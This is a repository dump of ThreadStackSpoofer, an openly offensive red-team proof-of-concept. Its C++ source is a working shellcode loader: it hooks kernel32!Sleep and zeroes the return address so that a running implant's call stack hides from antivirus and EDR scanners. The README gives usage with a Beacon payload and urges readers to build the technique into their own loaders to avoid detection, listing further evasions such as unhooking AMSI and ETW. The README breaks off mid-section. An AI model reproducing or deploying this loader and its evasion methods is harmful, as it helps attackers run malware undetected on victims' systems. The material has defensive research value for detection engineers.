├── images ├── frame0.png ├── spoofed2.png ├── not-spoofed.png └── legit-call-stack.png ├── ThreadStackSpoofer ├── ThreadStackSpoofer.vcxproj.user ├── ThreadStackSpoofer.vcxproj.filters ├── header.h ├── ThreadStackSpoofer.vcxproj └── main.cpp ├── LICENSE.txt ├── ThreadStackSpoofer.sln ├── CODE_OF_CONDUCT.md └── README.md /images/frame0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mgeeky/ThreadStackSpoofer/HEAD/images/frame0.png -------------------------------------------------------------------------------- /images/spoofed2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mgeeky/ThreadStackSpoofer/HEAD/images/spoofed2.png -------------------------------------------------------------------------------- /images/not-spoofed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mgeeky/ThreadStackSpoofer/HEAD/images/not-spoofed.png -------------------------------------------------------------------------------- /images/legit-call-stack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mgeeky/ThreadStackSpoofer/HEAD/images/legit-call-stack.png -------------------------------------------------------------------------------- /ThreadStackSpoofer/ThreadStackSpoofer.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | d:\dev2\ThreadStackSpoofer\tests\beacon64.bin 1 5 | WindowsLocalDebugger 6 | 7 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Mariusz Banach (mgeeky, ) 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software 
and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /ThreadStackSpoofer/ThreadStackSpoofer.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /ThreadStackSpoofer.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31105.61 5 | 
MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ThreadStackSpoofer", "ThreadStackSpoofer\ThreadStackSpoofer.vcxproj", "{9EED9E19-9475-4D2E-9B06-37D6799417FE}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x64.ActiveCfg = Debug|x64 17 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x64.Build.0 = Debug|x64 18 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x86.ActiveCfg = Debug|Win32 19 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x86.Build.0 = Debug|Win32 20 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x64.ActiveCfg = Release|x64 21 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x64.Build.0 = Release|x64 22 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x86.ActiveCfg = Release|Win32 23 | {9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {C5AF3E09-A902-42DF-9A8C-D63A66F8F25B} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ThreadStackSpoofer/header.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | typedef void (WINAPI* typeSleep)( 10 | DWORD dwMilis 11 | ); 12 | 13 | typedef DWORD(NTAPI* typeNtFlushInstructionCache)( 14 | HANDLE ProcessHandle, 15 | PVOID BaseAddress, 16 | ULONG NumberOfBytesToFlush 17 | ); 18 | 19 | typedef std::unique_ptr::type, decltype(&::CloseHandle)> HandlePtr; 20 | 21 | 
struct HookedSleep 22 | { 23 | typeSleep origSleep; 24 | BYTE sleepStub[16]; 25 | }; 26 | 27 | struct HookTrampolineBuffers 28 | { 29 | // (Input) Buffer containing bytes that should be restored while unhooking. 30 | BYTE* originalBytes; 31 | DWORD originalBytesSize; 32 | 33 | // (Output) Buffer that will receive bytes present prior to trampoline installation/restoring. 34 | BYTE* previousBytes; 35 | DWORD previousBytesSize; 36 | }; 37 | 38 | template 39 | void log(Args... args) 40 | { 41 | std::stringstream oss; 42 | (oss << ... << args); 43 | 44 | std::cout << oss.str() << std::endl; 45 | } 46 | 47 | static const DWORD Shellcode_Memory_Protection = PAGE_EXECUTE_READ; 48 | 49 | bool hookSleep(); 50 | void runShellcode(LPVOID param); 51 | bool injectShellcode(std::vector& shellcode, HandlePtr& thread); 52 | bool readShellcode(const char* path, std::vector& shellcode); 53 | bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers = NULL); 54 | void WINAPI MySleep(DWORD _dwMilliseconds); -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 
14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 
55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | Mariusz Banach (mgeeky, @mariuszbit, mb@binary-offensive.com). 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 
99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | 115 | ## Attribution 116 | 117 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 118 | version 2.0, available at 119 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 120 | 121 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 122 | enforcement ladder](https://github.com/mozilla/diversity). 123 | 124 | [homepage]: https://www.contributor-covenant.org 125 | 126 | For answers to common questions about this code of conduct, see the FAQ at 127 | https://www.contributor-covenant.org/faq. Translations are available at 128 | https://www.contributor-covenant.org/translations. 
129 | -------------------------------------------------------------------------------- /ThreadStackSpoofer/ThreadStackSpoofer.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {9eed9e19-9475-4d2e-9b06-37d6799417fe} 25 | ThreadStackSpoofer 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | stdcpp17 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | Level3 101 | true 102 | true 103 | true 104 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | true 106 | stdcpp17 107 | 108 | 109 | Console 110 | true 111 | true 112 | true 113 | 114 | 115 | 116 | 117 | Level3 118 | false 119 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | stdcpp17 122 | false 123 | false 124 | 125 | 126 | Console 127 | true 128 | 129 | 130 | 131 | 132 | Level3 133 | true 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | true 138 | stdcpp17 139 | 140 | 141 | Console 142 | true 143 | true 144 | true 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /ThreadStackSpoofer/main.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include "header.h" 3 | #include 4 | 5 | HookedSleep g_hookedSleep; 6 | 7 | 8 | 
void WINAPI MySleep(DWORD dwMilliseconds) 9 | { 10 | // 11 | // Locate this stack frame's return address. 12 | // 13 | auto overwrite = (PULONG_PTR)_AddressOfReturnAddress(); 14 | const auto origReturnAddress = *overwrite; 15 | 16 | log("[>] Original return address: 0x", 17 | std::hex, std::setw(8), std::setfill('0'), origReturnAddress, 18 | ". Finishing call stack..."); 19 | 20 | // 21 | // By overwriting the return address with 0 we're basically telling call stack unwinding algorithm 22 | // to stop unwinding call stack any further, as there further frames. This we can hide our remaining stack frames 23 | // referencing shellcode memory allocation from residing on a call stack. 24 | // 25 | *overwrite = 0; 26 | 27 | log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n"); 28 | 29 | // 30 | // Perform sleep emulating originally hooked functionality. 31 | // 32 | ::SleepEx(dwMilliseconds, false); 33 | 34 | // 35 | // Restore original thread's call stack. 36 | // 37 | log("[<] Restoring original return address..."); 38 | *overwrite = origReturnAddress; 39 | } 40 | 41 | bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers /*= NULL*/) 42 | { 43 | #ifdef _WIN64 44 | uint8_t trampoline[] = { 45 | 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, addr 46 | 0x41, 0xFF, 0xE2 // jmp r10 47 | }; 48 | 49 | uint64_t addr = (uint64_t)(jumpAddress); 50 | memcpy(&trampoline[2], &addr, sizeof(addr)); 51 | #else 52 | uint8_t trampoline[] = { 53 | 0xB8, 0x00, 0x00, 0x00, 0x00, // mov eax, addr 54 | 0xFF, 0xE0 // jmp eax 55 | }; 56 | 57 | uint32_t addr = (uint32_t)(jumpAddress); 58 | memcpy(&trampoline[1], &addr, sizeof(addr)); 59 | #endif 60 | 61 | DWORD dwSize = sizeof(trampoline); 62 | DWORD oldProt = 0; 63 | bool output = false; 64 | 65 | if (installHook) 66 | { 67 | if (buffers != NULL) 68 | { 69 | if (buffers->previousBytes == nullptr || buffers->previousBytesSize == 0) 70 | return false; 71 | 72 | 
memcpy(buffers->previousBytes, addressToHook, buffers->previousBytesSize); 73 | } 74 | 75 | if (::VirtualProtect( 76 | addressToHook, 77 | dwSize, 78 | PAGE_EXECUTE_READWRITE, 79 | &oldProt 80 | )) 81 | { 82 | memcpy(addressToHook, trampoline, dwSize); 83 | output = true; 84 | } 85 | } 86 | else 87 | { 88 | if (buffers == NULL) 89 | return false; 90 | 91 | if (buffers->originalBytes == nullptr || buffers->originalBytesSize == 0) 92 | return false; 93 | 94 | dwSize = buffers->originalBytesSize; 95 | 96 | if (::VirtualProtect( 97 | addressToHook, 98 | dwSize, 99 | PAGE_EXECUTE_READWRITE, 100 | &oldProt 101 | )) 102 | { 103 | memcpy(addressToHook, buffers->originalBytes, dwSize); 104 | output = true; 105 | } 106 | } 107 | 108 | static typeNtFlushInstructionCache pNtFlushInstructionCache = NULL; 109 | if (!pNtFlushInstructionCache) 110 | pNtFlushInstructionCache = (typeNtFlushInstructionCache) 111 | GetProcAddress(GetModuleHandleA("ntdll"), "NtFlushInstructionCache"); 112 | 113 | // 114 | // We're flushing instructions cache just in case our hook didn't kick in immediately. 
115 | // 116 | if (pNtFlushInstructionCache) 117 | pNtFlushInstructionCache(GetCurrentProcess(), addressToHook, dwSize); 118 | 119 | ::VirtualProtect( 120 | addressToHook, 121 | dwSize, 122 | oldProt, 123 | &oldProt 124 | ); 125 | 126 | return output; 127 | } 128 | 129 | bool hookSleep() 130 | { 131 | HookTrampolineBuffers buffers = { 0 }; 132 | buffers.previousBytes = g_hookedSleep.sleepStub; 133 | buffers.previousBytesSize = sizeof(g_hookedSleep.sleepStub); 134 | 135 | g_hookedSleep.origSleep = reinterpret_cast(Sleep); 136 | 137 | if (!fastTrampoline(true, (BYTE*)::Sleep, (void*)&MySleep, &buffers)) 138 | return false; 139 | 140 | return true; 141 | } 142 | 143 | bool readShellcode(const char* path, std::vector& shellcode) 144 | { 145 | HandlePtr file(CreateFileA( 146 | path, 147 | GENERIC_READ, 148 | FILE_SHARE_READ, 149 | NULL, 150 | OPEN_EXISTING, 151 | 0, 152 | NULL 153 | ), &::CloseHandle); 154 | 155 | if (INVALID_HANDLE_VALUE == file.get()) 156 | return false; 157 | 158 | DWORD highSize; 159 | DWORD readBytes = 0; 160 | DWORD lowSize = GetFileSize(file.get(), &highSize); 161 | 162 | shellcode.resize(lowSize, 0); 163 | 164 | return ReadFile(file.get(), shellcode.data(), lowSize, &readBytes, NULL); 165 | } 166 | 167 | void runShellcode(LPVOID param) 168 | { 169 | auto func = ((void(*)())param); 170 | 171 | // 172 | // Jumping to shellcode. Look at the coment in injectShellcode() describing why we opted to jump 173 | // into shellcode in a classical manner instead of fancy hooking 174 | // ntdll!RtlUserThreadStart+0x21 like in ThreadStackSpoofer example. 
175 | // 176 | func(); 177 | } 178 | 179 | bool injectShellcode(std::vector& shellcode, HandlePtr& thread) 180 | { 181 | // 182 | // Firstly we allocate RW page to avoid RWX-based IOC detections 183 | // 184 | auto alloc = ::VirtualAlloc( 185 | NULL, 186 | shellcode.size() + 1, 187 | MEM_COMMIT, 188 | PAGE_READWRITE 189 | ); 190 | 191 | if (!alloc) 192 | return false; 193 | 194 | memcpy(alloc, shellcode.data(), shellcode.size()); 195 | 196 | DWORD old; 197 | 198 | // 199 | // Then we change that protection to RX 200 | // 201 | if (!VirtualProtect(alloc, shellcode.size() + 1, Shellcode_Memory_Protection, &old)) 202 | return false; 203 | 204 | shellcode.clear(); 205 | 206 | // 207 | // Example provided in previous release of ThreadStackSpoofer: 208 | // https://github.com/mgeeky/ThreadStackSpoofer/blob/ec0237c5f8b1acd052d57562a43f40a20752b5ca/ThreadStackSpoofer/main.cpp#L417 209 | // showed how we can start our shellcode from temporarily hooked ntdll!RtlUserThreadStart+0x21 . 210 | // 211 | // That approached was a bit flawed due to the fact, the as soon as we introduce a hook within module, 212 | // even when we immediately unhook it the system allocates a page of memory (4096 bytes) of type MEM_PRIVATE 213 | // inside of a shared library allocation that comprises of MEM_IMAGE/MEM_MAPPED pool. 214 | // 215 | // Memory scanners such as Moneta are sensitive to scanning memory mapped PE DLLs and finding amount of memory 216 | // labeled as MEM_PRIVATE within their region, considering this (correctly!) as a "Modified Code" anomaly. 217 | // 218 | // We're unable to evade this detection for kernel32!Sleep however we can when it comes to ntdll. Instead of 219 | // running our shellcode from a legitimate user thread callback, we can simply run a thread pointing to our 220 | // method and we'll instead jump to the shellcode from that method. 
221 | // 222 | // After discussion I had with @waldoirc we came to the conclusion that in order not to bring new IOCs it is better 223 | // to start shellcode from within EXE's own code space, thus avoiding detections based on `ntdll!RtlUserThreadStart+0x21` 224 | // being an outstanding anomaly in some environments. Shout out to @waldoirc for our really long discussion! 225 | // 226 | thread.reset(::CreateThread( 227 | NULL, 228 | 0, 229 | (LPTHREAD_START_ROUTINE)runShellcode, 230 | alloc, 231 | 0, 232 | 0 233 | )); 234 | 235 | return (NULL != thread.get()); 236 | } 237 | 238 | int main(int argc, char** argv) 239 | { 240 | if (argc < 3) 241 | { 242 | log("Usage: ThreadStackSpoofer.exe "); 243 | return 1; 244 | } 245 | 246 | std::vector shellcode; 247 | bool spoof = (!strcmp(argv[2], "true") || !strcmp(argv[2], "1")); 248 | 249 | log("[.] Reading shellcode bytes..."); 250 | if (!readShellcode(argv[1], shellcode)) 251 | { 252 | log("[!] Could not open shellcode file! Error: ", ::GetLastError()); 253 | return 1; 254 | } 255 | 256 | if (spoof) 257 | { 258 | log("[.] Hooking kernel32!Sleep..."); 259 | if (!hookSleep()) 260 | { 261 | log("[!] Could not hook kernel32!Sleep!"); 262 | return 1; 263 | } 264 | } 265 | else 266 | { 267 | log("[.] Thread call stack will NOT be spoofed."); 268 | } 269 | 270 | log("[.] Injecting shellcode..."); 271 | 272 | HandlePtr thread(NULL, &::CloseHandle); 273 | if (!injectShellcode(shellcode, thread)) 274 | { 275 | log("[!] Could not inject shellcode! 
Error: ", ::GetLastError());
276 |         return 1;
277 |     }
278 |
279 |     log("[+] Shellcode is now running.");
280 |
281 |     WaitForSingleObject(thread.get(), INFINITE);
282 | }
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Thread Stack Spoofing / Call Stack Spoofing PoC
2 |
3 | A PoC implementation of an advanced in-memory evasion technique that spoofs a thread's call stack. This technique makes it possible to bypass thread-based memory examination rules and better hide shellcode while it resides in process memory.
4 |
5 | ## Intro
6 |
7 | This is an example implementation of the _Thread Stack Spoofing_ technique, aiming to evade Malware Analysts, AVs and EDRs looking for references to shellcode's frames in an examined thread's call stack.
8 | The idea is to hide references to the shellcode on the thread's call stack, thus masquerading allocations containing malware's code.
9 |
10 | This implementation, along with my [ShellcodeFluctuation](https://github.com/mgeeky/ShellcodeFluctuation), brings the Offensive Security community sample implementations to catch up on the offering made by commercial C2 products, so that we can do no worse in our Red Team toolings. 💪
11 |
12 |
13 | ### Implementation has changed
14 |
15 | The current implementation differs heavily from what was originally published.
16 | This is because I realised there is a much simpler approach to terminate the processing of a thread's call stack and hide the shellcode's related frames: simply writing `0` to the return address of the first frame we control:
17 |
18 | ```
19 | void WINAPI MySleep(DWORD _dwMilliseconds)
20 | {
21 |     [...]
22 |     auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();
23 |     const auto origReturnAddress = *overwrite;
24 |     *overwrite = 0;
25 |
26 |     [...]
27 |     *overwrite = origReturnAddress;
28 | }
29 | ```
30 |
31 | The previous implementation, utilising `StackWalk64`, can be accessed in this [commit c250724](https://github.com/mgeeky/ThreadStackSpoofer/tree/c2507248723d167fb2feddf50d35435a17fd61a2).
32 |
33 | This implementation is much more stable and works nicely on both `Debug` and `Release` under two architectures - `x64` and `x86`.
34 |
35 |
36 | ## Demo
37 |
38 | This is how a call stack may look when it is **NOT** spoofed:
39 |
40 | ![not-spoofed](images/not-spoofed.png)
41 |
42 | And this is how it looks when thread stack spoofing is enabled:
43 |
44 | ![spoofed](images/spoofed2.png)
45 |
46 | Above we can see that the last frame on our call stack is our `MySleep` callback.
47 | One may wonder whether this immediately brings opportunities for new IOCs. Hunting rules can look for threads whose call stacks do not unwind into the following expected thread entry points located within system libraries:
48 |
49 | ```
50 | kernel32!BaseThreadInitThunk+0x14
51 | ntdll!RtlUserThreadStart+0x21
52 | ```
53 |
54 | Although the call stack of the spoofed thread may look rather odd at first, a brief examination of my system showed that there are other threads not unwinding to the above entry points as well:
55 |
56 | ![legit call stack](images/legit-call-stack.png)
57 |
58 | The above screenshot shows a thread of unmodified **Total Commander x64**. As we can see, its call stack pretty much resembles our own in terms of initial call stack frames.
59 |
60 | Why should we care about carefully faking our call stack when there are processes exhibiting traits that we can simply mimic?
61 |
62 |
63 | ## How it works?
64 |
65 | The rough algorithm is as follows:
66 |
67 | 1. Read shellcode's contents from file.
68 | 2. Acquire all the necessary function pointers from `dbghelp.dll`, call `SymInitialize`
69 | 3. Hook `kernel32!Sleep` pointing back to our callback.
70 | 4. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread`.
The thread should start from our `runShellcode` function to avoid having the thread's _StartAddress_ point somewhere unexpected and anomalous (such as `ntdll!RtlUserThreadStart+0x21`).
71 | 5. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked.
72 | 6. We then overwrite the last return address on the stack with `0`, which should effectively finish the call stack.
73 | 7. Finally, a call to `::SleepEx` is made to let the Beacon sleep while waiting for further communication.
74 | 8. After the sleep is finished, we restore the previously saved original return address and execution is resumed.
75 |
76 | Function return addresses are scattered all around the thread's stack memory area, pointed to by the `RBP/EBP` register.
77 | In order to find them on the stack, we first need to collect frame pointers, then dereference them for overwriting:
78 |
79 | ![stack frame](images/frame0.png)
80 |
81 | _(the above image was borrowed from **Eli Bendersky's** post named [Stack frame layout on x86-64](https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64/))_
82 |
83 | ```
84 | *(PULONG_PTR)(frameAddr + sizeof(void*)) = Fake_Return_Address;
85 | ```
86 |
87 | The initial implementation of `ThreadStackSpoofer` did that in the `walkCallStack` and `spoofCallStack` functions; however, the current implementation shows that these efforts _are not required to maintain a stealthy call stack_.
88 |
89 |
90 | ## Example run
91 |
92 | Use case:
93 |
94 | ```
95 | C:\> ThreadStackSpoofer.exe
96 | ```
97 |
98 | Where:
99 | - `` is a path to the shellcode file
100 | - `` when `1` or `true` will enable thread stack spoofing and anything else disables it.
101 |
102 |
103 | Example run that spoofs beacon's thread call stack:
104 |
105 | ```
106 | PS D:\dev2\ThreadStackSpoofer> .\x64\Release\ThreadStackSpoofer.exe .\tests\beacon64.bin 1
107 | [.] Reading shellcode bytes...
108 | [.] Hooking kernel32!Sleep...
109 | [.] Injecting shellcode...
110 | [+] Shellcode is now running.
111 | [>] Original return address: 0x1926747bd51. Finishing call stack...
112 |
113 | ===> MySleep(5000)
114 |
115 | [<] Restoring original return address...
116 | [>] Original return address: 0x1926747bd51. Finishing call stack...
117 |
118 | ===> MySleep(5000)
119 |
120 | [<] Restoring original return address...
121 | [>] Original return address: 0x1926747bd51. Finishing call stack...
122 | ```
123 |
124 | ---
125 |
126 | ## How do I use it?
127 |
128 | Look at the code and its implementation, understand the concept and re-implement it within your own Shellcode Loaders that you utilise to deliver your Red Team engagements.
129 | This is yet another technique for advanced in-memory evasion that increases your Teams' chances of not getting caught by Anti-Viruses, EDRs and Malware Analysts taking a look at your implants.
130 |
131 | While developing your advanced shellcode loader, you might also want to implement:
132 |
133 | - **Process Heap Encryption** - take inspiration from this blog post: [Hook Heaps and Live Free](https://www.arashparsa.com/hook-heaps-and-live-free/) - which can let you evade Beacon configuration extractors like [`BeaconEye`](https://github.com/CCob/BeaconEye)
134 | - **Change your Beacon's memory pages protection to `RW` (from `RX/RWX`) and encrypt their contents** - using [Shellcode Fluctuation](https://github.com/mgeeky/ShellcodeFluctuation) technique - right before sleeping (that could evade scanners such as [`Moneta`](https://github.com/forrest-orr/moneta) or [`pe-sieve`](https://github.com/hasherezade/pe-sieve))
135 | - **Clear out any leftovers from Reflective Loader** to avoid in-memory signature-based detections
136 | - **Unhook everything you might have hooked** (such as AMSI, ETW, WLDP) before sleeping and then re-hook afterwards.
137 |
138 |
139 | ---
140 |
141 | ## Actually this is not (yet) a true stack spoofing
142 |
143 | As it's been pointed out to me, the technique here does not _yet_ truly live up to its name of a _stack spoofer_. Since we're merely overwriting return addresses on the thread's stack, we're not spoofing the remaining areas of the stack itself. Moreover, we're leaving our call stack _non-unwindable_, making it look anomalous since the system will not be able to properly walk the entire chain of call stack frames.
144 |
145 | Although I'm aware of these shortcomings, I've left it as is for now, since I cared mostly about evading automated scanners that could iterate over processes, enumerate their threads, walk those threads' stacks and pick up on any return address pointing back to non-image memory (such as `MEM_PRIVATE` - the one allocated dynamically by `VirtualAlloc` and friends). A focused malware analyst would immediately spot the oddity and consider the thread rather unusual, hunting down our implant. More than sure about it. Yet I don't believe that today's automated scanners such as AV/EDR implement the sort of heuristics that would _actually walk each thread's stack_ to verify whether it's unwindable `¯\_(ツ)_/¯` .
146 |
147 | Surely this project (and the commercial implementations found in C2 frameworks) gives AV & EDR vendors arguments to consider implementing appropriate heuristics covering such a novel evasion technique.
148 |
149 | In order to improve this technique, one can aim for a true _Thread Stack Spoofer_ by inserting carefully crafted fake stack frames established in a reverse-unwinding process.
150 | Read more on this idea below.
151 |
152 |
153 | ### Implementing a true Thread Stack Spoofer
154 |
155 | An hours-long conversation with [namazso](https://twitter.com/namazso) taught me that in order to aim for a proper thread stack spoofer we would need to reverse the x64 call stack unwinding process.
156 | First, one needs to carefully study the stack unwinding process explained in (a), linked below. When the system traverses a thread's call stack on the x64 architecture, it does not simply rely on return addresses scattered around the thread's stack, but rather it:
157 |
158 | 1. Takes the return address.
159 | 2. Attempts to identify the function containing that address (with [RtlLookupFunctionEntry](https://docs.microsoft.com/en-us/windows/win32/api/winnt/nf-winnt-rtllookupfunctionentry)).
160 | 3. That function returns a `RUNTIME_FUNCTION` entry, which in turn references the `UNWIND_INFO` and `UNWIND_CODE` structures. These structures describe the function's beginning and ending addresses and all the prologue operations that modify `RBP` or `RSP`.
